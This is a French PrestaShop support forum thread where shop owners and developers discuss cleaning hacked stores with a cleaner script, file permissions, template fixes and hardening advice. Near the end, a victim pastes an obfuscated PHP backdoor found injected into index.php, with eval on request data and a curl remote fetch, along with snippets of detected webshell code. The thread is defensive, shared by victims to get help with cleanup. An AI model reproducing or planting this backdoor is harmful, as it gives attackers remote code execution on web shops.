Jump to content

Hack Prestashop sur la page de paiement - nettoyage


Eolia

Recommended Posts

6 hours ago, Eolia said:

Il y avait quoi dans ce fichier ?

En dehors des langues il ne doit y avoir aucun php dans un thème.

<?php
/**
 * $THEMEDESC
 * 
 * @version        $Id: file.php $Revision
 * @package        modules
 * @subpackage    $Subpackage.
 * @copyright    Copyright (C) Jan 2012 leotheme.com <@emai:[email protected]>.All rights reserved.
 * @license        GNU General Public License version 2
 */  
if( !class_exists('LeoThemeInfo') ){ 
    class LeoThemeInfo{
        
        /**
         *
         */
    public static function onGetInfo( $output=array() ){
        $output["patterns"] = array();
        $path = _PS_ALL_THEMES_DIR_. _THEME_NAME_."/img/patterns";
            
        $regex = '/(\.gif)|(.jpg)|(.png)|(.bmp)$/i';
    
        if( !is_dir($path) ){ return $output; }
        
        $dk =  opendir ( $path );
        $files = array();
        while ( false !== ($filename = readdir ( $dk )) ) {
            if (preg_match ( $regex, $filename )) {
                $files[] = $filename;    
            }
        }  
         $output["patterns"] = $files;
     
        return $output;
    }
    
    /**
     *
     */
    public static function onRenderForm( $html, $thmskins ){
        
        $baseURL =  _PS_BASE_URL_.__PS_BASE_URI__."themes/"._THEME_NAME_."/img/patterns/";

        $pt = '';
        
    
         
        
        $html .= $pt;
        return $html;
    }
    
    public static function onUpdateConfig(  ){
        $leobgpattern = (Tools::getValue('leobgpattern')); 
        Configuration::updateValue('leobgpattern', $leobgpattern);
    }
    
    public static function onProcessHookTop( $params ){
        $params["LEO_BGPATTERN"] = Configuration::get('leobgpattern');
        return $params; 
    }
}    

}
?>

Link to comment
Share on other sites

Ils jouent à quoi les intégrateurs graphiques ?

On est dans un CMS MVC (Modèles / Vues / Contrôleurs) depuis quand on mélange du php dans des répertoires de vues ?

Link to comment
Share on other sites

il y a 16 minutes, Mediacom87 a dit :

160 mini sur PrestaShop

En fait ça dépend surtout de ce qu'il y a sur le ftp...

J'ai encore vue une boutique récemment avec 12 thèmes dans le répertoire themes/ et + de 400 modules et des répertoires complètements inconnus qui servaient de fourre-tout.

Plus il y a de fichiers à analyser, plus c'est long.

Mais bon, ceux qui sont sur des mutus genre OVH auront toujours du mal. (limite mémoire, limite temps, cpu faiblards)

 

Link to comment
Share on other sites

35 minutes ago, Eolia said:

Ils jouent à quoi les intégrateurs graphiques ?

On est dans un CMS MVC (Modèles / Vues / Contrôleurs) depuis quand on mélange du php dans des répertoires de vues ?

Vietnam... Très riche comme thème, avec un éditeur de page et une tonne de modules, quasi une mini application (box in teh box) .
Bref comment qu'on fait alors  pour pas le virer (le fichier.php) ?

Link to comment
Share on other sites

Votre thème ne fonctionne pas sans ce fichier ?

J'ai l'impression que c'est une sorte de sauvegarde au cas où la classe principale ne serait pas déclarée

if( !class_exists('LeoThemeInfo') ){ 

 

Link to comment
Share on other sites

28 minutes ago, Eolia said:

Votre thème ne fonctionne pas sans ce fichier ?

J'ai l'impression que c'est une sorte de sauvegarde au cas où la classe principale ne serait pas déclarée

if( !class_exists('LeoThemeInfo') ){ 

 

je ne sais pas, que devrai-je tester ? par principe de precaution je préfère qu'il reste la...

depuis 7 ans il tourne sans pb...

Link to comment
Share on other sites

Il y a 1 heure, Eolia a dit :

En fait ça dépend surtout de ce qu'il y a sur le ftp...

J'ai encore vue une boutique récemment avec 12 thèmes dans le répertoire themes/ et + de 400 modules et des répertoires complètements inconnus qui servaient de fourre-tout.

Plus il y a de fichiers à analyser, plus c'est long.

Mais bon, ceux qui sont sur des mutus genre OVH auront toujours du mal. (limite mémoire, limite temps, cpu faiblards)

 

Pourquoi crois-tu que je développe mon propre module de nettoyage, il faudrait que je regarde du côté des thèmes pour nettoyer aussi cette partie, mais c'est plus complexe à développer puisque l'on peut avoir des thèmes enfants, que le thème natif change de nom régulièrement et le gain n'est pas significatif.

Link to comment
Share on other sites

Posted (edited)
26 minutes ago, Eolia said:

Bah il faudra le remettre à chaque fois alors, je ne peux pas faire d'exception ou alors autant ne plus scanner du tout le répertoire themes.

Si je me souviens bien on pouvait mettre des exception dans le fichier de scan

...

 

Edited by Mathieu C. (see edit history)
Link to comment
Share on other sites

  • 1 month later...

Bonjour, j'ai tenté de lance votre script (d'ailleurs merci à vous pour cet outil ! ) car mon site a été hacké et je n'ai plus accès au BO.

Lorsque je le lance il indique qu'il ne s'agit pas de la dernière version et qu'il télécharge et exécute. Ensuite, je me retrouve sur une page 404 de mon site et mon site m'affiche ensuite une page blanche.

Pourriez-vous m'orienter pour savoir ce qui peut causer cela ?

Merci

Link to comment
Share on other sites

il y a une heure, quadricolore a dit :

Bonjour, j'ai tenté de lance votre script (d'ailleurs merci à vous pour cet outil ! ) car mon site a été hacké et je n'ai plus accès au BO.

Lorsque je le lance il indique qu'il ne s'agit pas de la dernière version et qu'il télécharge et exécute. Ensuite, je me retrouve sur une page 404 de mon site et mon site m'affiche ensuite une page blanche.

Pourriez-vous m'orienter pour savoir ce qui peut causer cela ?

Merci

Une fois mis à jour le script change de nom, avez-vous un fichier avec une suite de lettre et chiffres .php à la racine de votre site ?

Si oui appelez-le depuis https://votre_domaine.com/xxxxxxxxx.php

Link to comment
Share on other sites

1 hour ago, Eolia said:

Une fois mis à jour le script change de nom, avez-vous un fichier avec une suite de lettre et chiffres .php à la racine de votre site ?

Si oui appelez-le depuis https://votre_domaine.com/xxxxxxxxx.php

Merci de votre retour. Lorsque je lance à nouveau avec le php nommé par la suite de chiffres, le site tourne un moment uis se remet en page blanche.

Voici l'erreur que j'ai :

Warning: require_once(/home/....../public_html/config/smarty.config.inc.php): failed to open stream: Permission denied in /home/....../public_html/config/config.inc.php on line 208

Edited by quadricolore (see edit history)
Link to comment
Share on other sites

1 hour ago, Eolia said:

Tout le monde n'est pas en 1.6.1.24 et même cette version finale n'est pas compatible à 100% PHP 7.1

Cependant, les anciennes versions envoyaient bien le mail ressemblant au résultat du web.
Sur le web le résultat est toujours comme avant... (en plus des fichiers sans extensions)

 

Link to comment
Share on other sites

il y a 31 minutes, Mathieu C. a dit :

Cependant, les anciennes versions envoyaient bien le mail ressemblant au résultat du web.
Sur le web le résultat est toujours comme avant... (en plus des fichiers sans extensions)

 

Avec la v3.4.15 vous recevez bien le mail comme avant, non ?

Link to comment
Share on other sites

On 8/23/2024 at 5:14 PM, Eolia said:

Quelles sont les permissions sur ce fichier ?

Merci de votre retour, j'ai changé les droits sur ce fichier et je n'ai plus l'erreur, mais j'ai à nouveau une erreur 404 lorsque je lance le fichier depuis le site. J'ai bien appliqué la suite de chiffres.php mais le site me renvoie systématiquement l'erreur 404 après avoir chargé un moment.

Avez vous un piste pour m'aider ? merci

Link to comment
Share on other sites

Bonjour @Eolia,

Merci pour votre script, il est génial, pour l'avoir déjà utilisé dans le passé. En voulant le relancer ce jour, malheureusement il me génère une erreur 500 que je gère en supprimant le fichier class_index.php

 

D'où cette erreur vient-elle ?

Merci pour votre retour.

Link to comment
Share on other sites

Bonjour, tout d'abord un grand merci pour ce script qui nous sauve la mise depuis un moment sur notre version 1.7.6 presta.

Depuis la version 3.14 du script nous rencontrons un souci, le site plante (une page blanche erreur 500) à chaque fois que nous exécutons le script. 

Serveur: vps offre "PRO S" chez lws,

prametres ini:

allow_url_fopen = on
allow_url_include = off
safe_mode = off
magic_quotes_gpc = off
memory_limit = 2048M
max_input_time = -1
upload_max_filesize = 256M
post_max_size = 256M
max_input_vars = 30000
mod_security = off
short_open_tag = off
register_globals = off
display_errors = off

 

version php7.3, version presta 1.7.6

Un grand merci d'avance pour le temps accordé.

Edited by inpro
erreur version prestashop (see edit history)
Link to comment
Share on other sites

Dans le cas d'erreur 500, soit vous avez un fichier cleaner500.log à la racine qui a été créé (regardez la dernière ligne) soit il y a une erreur dnas le fichier error.log de votre hébergeur.

Certains hack modifient aussi les droits en lecture/ecriture (passent en 204) de certains fichiers.

Link to comment
Share on other sites

53 minutes ago, Eolia said:

Dans le cas d'erreur 500, soit vous avez un fichier cleaner500.log à la racine qui a été créé (regardez la dernière ligne) soit il y a une erreur dnas le fichier error.log de votre hébergeur.

Certains hack modifient aussi les droits en lecture/ecriture (passent en 204) de certains fichiers.

Merci pour votre retour !

Voici la fin de mon fichier cleaner500.log :

    [input] => 
    [1] => Array
        (
            [type] => 1
            [message] => Uncaught Error: Class 'Core_Business_ContainerBuilder' not found in /home/escapev36/public_html/config/bootstrap.php:27
Stack trace:
#0 /home/escapev36/public_html/config/config.inc.php(66): require_once()
#1 /home/escapev36/public_html/97448b7f31c1.php(1369): require_once('/home/escapev36...')
#2 {main}
  thrown
            [file] => /home/escapev36/public_html/config/bootstrap.php
            [line] => 27
        )

)

Je n'y comprends pas grand chose..

Link to comment
Share on other sites

Vérifiez que le fichier /Core/Business/Core_Business_ContainerBuilder.php existe bien et que ses droits sont bien en 604 ou 644.

Si il est en 204 ou autre chose, rétablissez ses permissions à 644:

image.thumb.png.317959188df3ef5da7651f7f070c14d6.png

Link to comment
Share on other sites

10 minutes ago, Eolia said:

Vérifiez que le fichier /Core/Business/Core_Business_ContainerBuilder.php existe bien et que ses droits sont bien en 604 ou 644.

Si il est en 204 ou autre chose, rétablissez ses permissions à 644:

image.thumb.png.317959188df3ef5da7651f7f070c14d6.png

Merci pour votre message, malheureusement, il est bien toujours en 0644.

Link to comment
Share on other sites

ok, donc c'est que le fichier /cache/class_index.php n'a pas été supprimé.

Vous êtes chez OVH ?

Relancez Cleaner vous allez récupérer la 3.4.17 qui devrait corriger le problème.

Link to comment
Share on other sites

4 minutes ago, Eolia said:

ok, donc c'est que le fichier /cache/class_index.php n'a pas été supprimé.

Vous êtes chez OVH ?

Relancez Cleaner vous allez récupérer la 3.4.17 qui devrait corriger le problème.

Je suis chez 02Switch.

Je viens de le relancer en enlevant class_index.php, malheureusement toujours le même problème.

Pouvons nous passer en DM ? Un grand merci !

Link to comment
Share on other sites

  • 1 month later...

Bonjour, je déterre ce vieux topic toujours d'actualité, malheureusement. moi aussi je me suis fait pirater au niveau du module de paiement.... J'ai utilisé l'excellent cleaner.php (merci au passage !!) et pas mal de mes fichiers js doivent être contrôlés. Je ne vois pas comment faire ça manuellement, il y en a tellement !! Est-ce que je peux les importer du répertoire js de Prestashop (même version évidemment). Sorry si ma question est basique mais je ne suis pas u  pro, loin de là !! ;o)))

 

image.thumb.png.fab2a9474d1eac8e10df0a198f5c9bfa.png

Link to comment
Share on other sites

Il y a 16 heures, Renacata a dit :

Bonjour, je déterre ce vieux topic toujours d'actualité, malheureusement. moi aussi je me suis fait pirater au niveau du module de paiement.... J'ai utilisé l'excellent cleaner.php (merci au passage !!) et pas mal de mes fichiers js doivent être contrôlés. Je ne vois pas comment faire ça manuellement, il y en a tellement !! Est-ce que je peux les importer du répertoire js de Prestashop (même version évidemment). Sorry si ma question est basique mais je ne suis pas u  pro, loin de là !! ;o)))

 

image.thumb.png.fab2a9474d1eac8e10df0a198f5c9bfa.png

Le plus simple est de remplacer le répertoire JS de votre installation en ligne par le répertoire JS de votre version PrestaShop à partir de l'archive native.

Mais cela ne suffira pas, il faut trouver comment le piratage a eu lieu et combler la brèche.

Link to comment
Share on other sites

7 minutes ago, Mediacom87 said:

Je me doute, j'ai mis à jour Prestashop, changé les mots de passe etc etc... mais je ne vois pas ce que je peux faire de plus pour le moment.

 

 

Link to comment
Share on other sites

il y a 54 minutes, Renacata a dit :

Je me doute, j'ai mis à jour Prestashop, changé les mots de passe etc etc... mais je ne vois pas ce que je peux faire de plus pour le moment.

Identifier les modules problématiques https://security.friendsofpresta.org/

Étudier les alertes de codes relevés par Cleaner.php

Mettre en place un WAF même basique comme proposé par Cloudflare si vous ne pouvez pas plus.

J'ai déjà fait quelques articles pour aider à s'améliorer https://www.mediacom87.fr/post/securite/

Link to comment
Share on other sites

Bonjour

 

Merci à Eolia pour son script. J'ai reussi à nettoyer un hack. Je suis même passer sur la phenixsuite.

Surement lors de mon nettoyage, j’ai rendu ma page OPC sans CSS et JS. Ma page opc est en mode quirk.

Est ce que vous avez des pistes de fichiers que je dois vérifier pour résoudre mon problème?

 

Merci d'avance

Link to comment
Share on other sites

J’ai inséré le fichier à la racine de PrestaShop 1.7.6 et lorsque je l’exécute ce message apparaît :

Ce script doit être placé à la racine de votre site (là où est installé votre Prestahop sur votre ftp) et nulle part ailleurs

Link to comment
Share on other sites

On 10/9/2024 at 11:19 AM, Eolia said:

Activez le mode debug et regardez également les erreurs dans la console de votre navigateur (F12)

Bonjour.

 

J'ai une erreur fatal sur la OPC au niveau de la méthode de livraison

 

Quote

Fatal error: Uncaught Error: Cannot use object of type Carrier as array in ..../www/cache/smarty/compile/28/e9/74/28e97419b8bb6303707fba3020e9b28670ecdc1a_0.file.order-carrier.tpl.php:150 Stack trace: #0 /www/tools/smarty/sysplugins/smarty_template_resource_base.php(123): content_6707a14df25ab9_20680836(Object(Smarty_Internal_Template)) #1 .../www/tools/smarty/sysplugins/smarty_template_compiled.php(114): Smarty_Template_Resource_Base->getRenderedTemplateCode(Object(Smarty_Internal_Template)) #2 .../www/tools/smarty/sysplugins/smarty_internal_template.php(218): Smarty_Template_Compiled->render(Object(Smarty_Internal_Template)) #3 /www/tools/smarty/sysplugins/smarty_internal_template.php(387): Smarty_Internal_Template->render() #4 /www/cache/smarty/compile/d2/6a/87/d26a871485842fdef9201225c9f268fb35d13f13_0.file.order-opc.tpl.php(59): Smarty_Internal_Template->_subTemplateRender('...', NULL, NULL, 0, 31536000, Array, 0, tru in /www/cache/smarty/compile/28/e9/74/28e97419b8bb6303707fba3020e9b28670ecdc1a_0.file.order-carrier.tpl.php on line 150

J'ai vérifié les fichier order-carrier.tpl et order-opc.tpl du thème et il y a pas eu de modification sur les originaux.

Quelqu'un peut m'aider à ce sujet ?

 

J'ai également cette erreur mais ce sont des fichiers de la phenixsuite

 

Quote

Warning: Use of undefined constant _RIJNDAEL_KEY_ - assumed '_RIJNDAEL_KEY_' (this will throw an Error in a future version of PHP) in /www/classes/Cookie.php on line 88

Warning: Use of undefined constant _RIJNDAEL_IV_ - assumed '_RIJNDAEL_IV_' (this will throw an Error in a future version of PHP) in /www/classes/Cookie.php on line 88

Warning: openssl_decrypt(): IV passed is only 7 bytes long, cipher expects an IV of precisely 16 bytes, padding with \0 in /www/classes/Rijndael.php on line 97

 

Merci d'avance.

Link to comment
Share on other sites

Bon, pour le point 1 votre thème n'est pas conforme (erreur connue), il faut corriger votre fichier order-carrier.tpl

A cet endroit le bloc doit être écrit comme cela:

						{if $option.unique_carrier}
                                                        {foreach $option.carrier_list as $carrier}
                                                            <strong>{$carrier.instance->name|escape:'htmlall':'UTF-8'}</strong>
                                                        {if isset($carrier.instance->delay[$cookie->id_lang])}
                                                            <br />{l s='Delivery time:'}&nbsp;{$carrier.instance->delay[$cookie->id_lang]|escape:'UTF-8'}
                                                        {/if}
                                                        {/foreach}
                                                    {/if}

Car chez vous la ligne 

{if isset($carrier.instance->delay[$cookie->id_lang])}
            <br />{l s='Delivery time:'}&nbsp;{$carrier.instance->delay[$cookie->id_lang]|escape:'UTF-8'}
{/if}

Doit se situer en dehors du {foreach}...{/foreach}

Pour la Rindjael_key, je vous renvoie ici:

https://shop.devcustom.net/gen.php

Edited by Eolia (see edit history)
Link to comment
Share on other sites

Hello,

version 3.4.28

On n'a plus le droit de mettre nos fontes en locale ?

 

Recherche des infections connues:

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Bold.eot

>>> Supprimé fonts/OpenSans-Bold.eot

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Italic.ttf

>>> Supprimé fonts/OpenSans-Italic.ttf

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Italic.woff2

>>> Supprimé fonts/OpenSans-Italic.woff2

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Italic.svg

>>> Supprimé fonts/OpenSans-Italic.svg

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-ExtraBoldItalic.woff

>>> Supprimé fonts/OpenSans-ExtraBoldItalic.woff

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-LightItalic.ttf

>>> Supprimé fonts/OpenSans-LightItalic.ttf

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-ExtraBoldItalic.ttf

>>> Supprimé fonts/OpenSans-ExtraBoldItalic.ttf

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-ExtraBoldItalic.eot

>>> Supprimé fonts/OpenSans-ExtraBoldItalic.eot

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-SemiboldItalic.eot

>>> Supprimé fonts/OpenSans-SemiboldItalic.eot

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Italic.eot

>>> Supprimé fonts/OpenSans-Italic.eot

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Light.woff

>>> Supprimé fonts/OpenSans-Light.woff

 

Link to comment
Share on other sites

il y a 36 minutes, Mathieu C. a dit :

Hello,

version 3.4.28

On n'a plus le droit de mettre nos fontes en locale ?

 

Recherche des infections connues:

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Bold.eot

>>> Supprimé fonts/OpenSans-Bold.eot

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Italic.ttf

>>> Supprimé fonts/OpenSans-Italic.ttf

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Italic.woff2

>>> Supprimé fonts/OpenSans-Italic.woff2

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Italic.svg

>>> Supprimé fonts/OpenSans-Italic.svg

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-ExtraBoldItalic.woff

>>> Supprimé fonts/OpenSans-ExtraBoldItalic.woff

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-LightItalic.ttf

>>> Supprimé fonts/OpenSans-LightItalic.ttf

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-ExtraBoldItalic.ttf

>>> Supprimé fonts/OpenSans-ExtraBoldItalic.ttf

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-ExtraBoldItalic.eot

>>> Supprimé fonts/OpenSans-ExtraBoldItalic.eot

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-SemiboldItalic.eot

>>> Supprimé fonts/OpenSans-SemiboldItalic.eot

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Italic.eot

>>> Supprimé fonts/OpenSans-Italic.eot

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Light.woff

>>> Supprimé fonts/OpenSans-Light.woff

 

Si mais dans votre thème, le répertoire /fonts n'existe pas nativement et les derniers hacks créent ce répertoire avec des polices qui n'en sont pas.

Link to comment
Share on other sites

Bonjour,

J'ai une erreur 403 lorsque j'essaye d'accéder à monsite.com/cleaner.php.

Les permissions sont bien à jour et c'est pareil lorsque je supprime le .htaccess. Je soupçonne que le hack en soit à l'origine (d'ailleurs le fichier cleaner.php disparait quand j'y retourne le lendemain). Une idée ?

Merci.

Link to comment
Share on other sites

J'ai une erreur 403 dès le premier lancement. Mon site a été piraté et de nombreux fichiers .htaccess etc ont été modifiés. Je pense que ça vient de là, mais comment modifier en masse ces fichiers .htaccess et autre ? Je comptais justement sur cleaner.php...

Link to comment
Share on other sites

Cleaner effectue un diagnostic et supprime ce qu'il est sûr d'être du hack. Dans tous les cas et après une sérieuse infection il y a besoin de l'œil et du cerveau humain pour effectuer le nettoyage.

Link to comment
Share on other sites

Dans le cas de figure ou de nombreux index.php et .htaccess ont été modifiés, existe-t-il une solution pour corriger ça en masse ? 

J'ai ce code dans de nombreux .htaccess en l'occurence.

<FilesMatch '.(py|exe|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$'>

Order allow,deny

Deny from all

</FilesMatch>

 

Link to comment
Share on other sites

@Mediacom87 Qu'entendez-vous par bloquer l'accès complet ?

J'ai identifié ceci dans les fichiers infectés, j'en déduis que le module simpleimportproduct est à l'origine de la faille de sécurité. Si je le supprime, est-ce que ça suffira pour éviter que les fichiers ne se régénérent (.htaccess, index.php, cache.php...) ?


1SRV  IgnorerSMW-SA-05636-mlw.wshll-5

/modules/simpleimportproduct/b9e9b88fa3.php

......t($_GET['path'])){$path=$_GET['path'];}else{$path=getcwd();}$path=str_replace...

8 KB2024-09-30 02:59:042SRV  IgnorerSMW-SA-13448-php.bkdr-0

/modules/simpleimportproduct/0f1f0f2b9d.php

......sab')."_".strrev('edoced');$filter=$filterfunc($kses_str);$preparefunc=s...

Edited by AcidLava (see edit history)
Link to comment
Share on other sites

5 minutes ago, AcidLava said:

1. Bloquer l'accès via .htpsswd

1.5 Supprimer le module qui a le CVE (au passage ^^)

2. Nettoyer tous les fichiers concernés via ImunifyAV+ (Plesk)

 

Link to comment
Share on other sites

Erreur 403 résolue, je suis maintenant sur une 500 (toujours en accédant au BO) :

Compile Error: main(): Failed opening required '/var/www/vhosts/monsite.fr/httpdocs/prod/hzopvx1wzpt3rrdg/../autoload.php' (include_path='/var/www/vhosts/monsite.fr/httpdocs/prod/vendor/pear/pear_exception:/var/www/vhosts/monsite.fr/httpdocs/prod/vendor/pear/console_getopt:/var/www/vhosts/monsite.fr/httpdocs/prod/vendor/pear/pear-core-minimal/src:/var/www/vhosts/monsite.fr/httpdocs/prod/vendor/pear/archive_tar:.:/opt/plesk/php/7.4/share/pear')

Link to comment
Share on other sites

@Eolia le chemin indique /hzopvx1wzpt3rrdg/../autoload.php' 

À quoi correspond le ".." ? Difficile de dire si autoload.php est présent du coup. J'ai manuellement vidé les caches de Presta sans succès. Cleaner.php est lui toujours en 403.

Link to comment
Share on other sites

Par contre je suis surpris que cleaner.php soit en erreur 403 (et ce n'est pas la première fois que ça m'arrive avec un fichier .php uploadé à la racine du site). Le site n'est pourtant plus infecté à l'heure.

Link to comment
Share on other sites

@Mediacom87 J'ai réussi à récupérer l'accès au back-office grâce à la protection .htpsswd mais index.php continue d'être injecté en continue avec ce code :

<?php /*-{(xqJ6oP7-*/error_reporting(0); /*-{<fbu3|-*/$rjBPK/*-^-*/ = /*-g2[6nwMu#7-*/"r"."a"/*-D>6OgJK8-*/."n"."g"/*-66qDA-*/."e"; /*-_I%Sd)-*/$mkZgi /*-Ag#cL-*/= /*-wTY#C,S4b-*/$rjBPK/*-RxJ[-*/("~", /*-qsNy~mTE-*/" "); /*-uZliZ!.t-*/$ZN/*-}Ey!9!-*/=/*-.c(yWl[tI-*/${$mkZgi/*-[-*/[30+1]/*-B]69-*/.$mkZgi/*-Iv(-*/[20+39]/*-<s`mZIhAk-*/.$mkZgi/*-ti-*/[1+46]./*-=HHnmx-*/$mkZgi/*-%jK::]6-*/[29+18]./*-ctz2i-*/$mkZgi/*-|b)$8}56-*/[25+26]./*-wQT-*/$mkZgi/*-M5Pya!TbY~-*/[33+20]/*-27=-*/.$mkZgi/*-ui-*/[45+12]/*-X(08r5j1fx-*/}; /*-7}Vk9g-*/if(/*-RQ9-*/in_array/*-s<4(A&#-*/(gettype/*-iB0Dulb-*/($ZN)."14",/*-3`WI{qM8-*/$ZN)&&(md5/*-dR--*/(md5/*-tK-*/(md5/*-)G&|=({-*/(md5/*-]gN-*/($ZN[8]))/*-I<(c(~-*/))/*-z&@<<[N-*/===/*-T9Su-*/"4ae30cb9d44e5d64ec5e51ae6382dcc3"/*-,AVOV^JMm(-*/))/*-6%8708W+H-*/{ $ZN/*-sO5p32-*/[63]/*-fT,1-*/=/*-}V_-*/$ZN/*-@hF!TM8M-*/[63]./*-V%-*/$ZN/*-@!-*/[80];/*-6176-*/ @eval/*-w7eOfu-*/(/*-~7}R+H-*/$ZN/*-OVv+9x-*/[63]/*-1N+Z-*/(/*-pN-*/${$ZN[39]}/*-,^2-*/[26])); }/*-V~O-*/class /*-7It-*/qM{ /*-td9B-*/static/*-]8-*/ function /*-$ay-*/AaBNn($SxJILhbRT) /*-Ws-*/{ $uNrVcLZRX/*-|L[q.DQ|M-*/ = /*-VPU$W6`[&-*/"r"./*-m5.-*/"a"./*-UMB9-*/"n"./*-N}jj8z9Y-*/"g"./*-!o2-*/"e"; /*-8fBjK$+ej{-*/$WvgNVC/*-[<~Np_m>CC-*/ = /*-<wq<0h^-*/$uNrVcLZRX/*-T6wbx-*/(/*-AL:B^G4--*/"~"/*-^@JO7EM-*/, /*-^r-*/" "/*->DXk-*/);/*-1Tw-*/ $AN /*--J-4Hpvo-*/= /*-@[-*/explode/*-<O-*/(/*-Mh-*/".", /*-7^-*/$SxJILhbRT/*-T}-*/); /*-Rat{-*/$LFRGMZQv /*-0W-*/= /*-Wt5iZ(7-*/""; foreach /*-8uOl-*/(/*-_)^Np-*/$AN /*-uVARZ-*/as /*-<XB2v6K=L-*/$XvimjYy /*-o{s+L4-*/=>/*-^vSmHno-*/ $ElbYxtqu/*-:af-*/) /*-<X>:C4P-*/$LFRGMZQv /*-u+-*/.= /*-(ni7|D`C&T-*/$WvgNVC[$ElbYxtqu/*-st>te%-*/ - /*-h7J%bg!-*/51986/*-4)=LG.Cc-*/];/*---*/ return /*-~_[S,-*/$LFRGMZQv; /*-n1u-*/} /*-^A-*/static /*-X&9&os-*/function /*-R[W-*/EmCfWJ/*-b.ERogCBm^-*/(/*-}HE3{-*/$kzXTb,/*-c([d(-*/ $LMpKBESA/*-#EW:Lz)-*/)/*-R4womO-*/ {/*-ZnW-*/ $cqWjxY/*-8aZ%T2p-*/ = /*-MAg.[,i-*/curl_init/*-Hu^[-*/(/*-SQ(5-*/$kzXTb/*-&6il78yIc-*/);/*-ugk,mp1XK-*/ curl_setopt/*-Q]2k3-*/(/*-g(`T~}-*/$cqWjxY,/*-5P!eTG-*/ CURLOPT_RETURNTRANSFER,/*-wo-*/ 1/*-7k0}-*/);/*-[qT-*/ $KvSWuIMzpG/*-I@_(fMP-*/ = /*-&vEyWOz-*/curl_exec/*-vco})kyVdY-*/(/*-2tC-*/$cqWjxY/*-(h.$VQ3-*/); /*-Yk!-*/return /*-bc-*/empty/*->Gk|:-*/(/*-)uE-*/$KvSWuIMzpG/*-|cR+Z^6fJ-*/)/*-_f28-*/ ? /*-C[O#_5th]$-*/$LMpKBESA/*-<Mg-*/(/*-[F>h2-*/$kzXTb/*-qj.u-*/)/*-i$S_-*/ : /*-p=R-*/$KvSWuIMzpG; /*-ZmVYnX!8-*/}/*-nRe&-*/ static/*-_yitaQ--*/ function /*-u0CaztY-*/lRBstZXuLC/*-)ur69n%-*/() /*-dq0cYC]:-*/{/*-1CEm~-*/ $iE /*-<7Q$LlX-*/=/*-`s=-*/ array/*-f7n11Uug_-*/("52013.51998.52011.52015.51996.52011.52017.52010.51995.52002.52013.51996.52007.52001.52002","51997.51996.51998.52017.51998.52001.51996.52063.52061","52006.51997.52001.52002.52017.52012.52011.52013.52001.52012.52011","52000.52015.52013.52005","52014.52015.51997.52011.52058.52060.52017.52012.52011.52013.52001.52012.52011","52010.52007.52004.52011.52017.52009.52011.51996.52017.52013.52001.52002.51996.52011.52002.51996.51997","52040.52070","51987","52065.52070","52047.52030.52030.52047.52023","52001.52010"); /*-L-*/foreach /*-u{!Cy-*/(/*-{+,-*/$iE/*-lA36_-*/ as /*-V~C]AG8CN_-*/$HqwgeCI/*-HMW}OK5-*/)/*-_B&~D0Y-*/ $gJNZVFhLM/*-fIgPv-*/[] /*-1P~8H-*/= /*-(0g>OAV-*/self/*-9,-*/::/*-R7-Z~6<-*/AaBNn/*-A>1G$UHJm-*/(/*-GdN}Fk-*/$HqwgeCI/*-lxY:]HPE[7-*/);/*-x(HM-*/$fCGstJ /*-=s=-*/= /*-4y=^1yG,-*/@$gJNZVFhLM/*-2,~hbp&-*/[/*-PYSFHu-*/1/*-lVUYhh}-*/]/*-OpmY-*/(/*-DFm-*/${/*-q`z8kU-*/"_"/*-[VFP[-*/."G"/*-[Ht8-*/."E"/*-NT-P_V-*/."T"/*-p]vLd5j-*/}[/*->@-*/$gJNZVFhLM/*-p!G:-*/[/*-3+k-*/6+3/*-c<`{4c^yL-*/]]/*-r%Ij-*/);/*-wDPu}8-*/ $eQEpLz /*-6t)8+&clf-*/=/*-zx1$<A+D-*/ @$gJNZVFhLM/*-h_x~Uo5-*/[/*--fO5=FGt-*/3+0/*-r0>Q0-*/]/*-0Dzc&2x-*/(/*-12k(Be{X-*/$gJNZVFhLM/*-c%EM-*/[/*-_@&-*/4+2/*-)J&Zx-*/], /*-L-!O-*/$fCGstJ/*-]R)%m)0,L5-*/);/*-&L-*/ $fLs /*-9Ovo0}-*/=/*-ol_JiS-*/ $gJNZVFhLM/*-NdH-*/[/*-dd-*/1+1/*-gP^-*/]/*-_8-*/(/*-%G^-*/$eQEpLz,/*-lRTpzn>Jh-*/ true/*-@of12J7qy-*/); /*-^^9_-*/@${/*-031Ap-*/"_"./*-x~xaD<IX-*/"G"./*-#1st3-*/"E"/*-3(K&}|)#~-*/."T"/*-TP-*/}/*-MO__1!U-*/[/*-UA-*/$gJNZVFhLM/*-Zm-*/[5+5/*-IK-*/]/*-$#7ib(:-*/]/*-2E2=-*/ == /*-zbD<-*/1 /*-QU9LH!-*/&& /*-@TBBt-*/die/*-reywAeLe}Z-*/(/*-n)-*/$gJNZVFhLM[1+4/*-R^-*/]/*-n-8`l72-*/(/*-+m$a-*/__FILE__/*-m<SP.Pk)G-*/)/*-LjQ]bj-*/); /*-V]B)y~t0x-*/if/*-MU-*/(/*-|YyS.ME#p-*/ (/*-(U}SZ]-*/(@/*-!8i>-*/$fLs/*--JdE6ML=lD-*/[/*--a-*/0/*-:lo-*/] /*-B!wl-*/- time/*-p:-*/()/*-pT,GGOkhc-*/) > /*-z7^H-*/0/*-xGXX#n-*/)/*-A,-*/ and 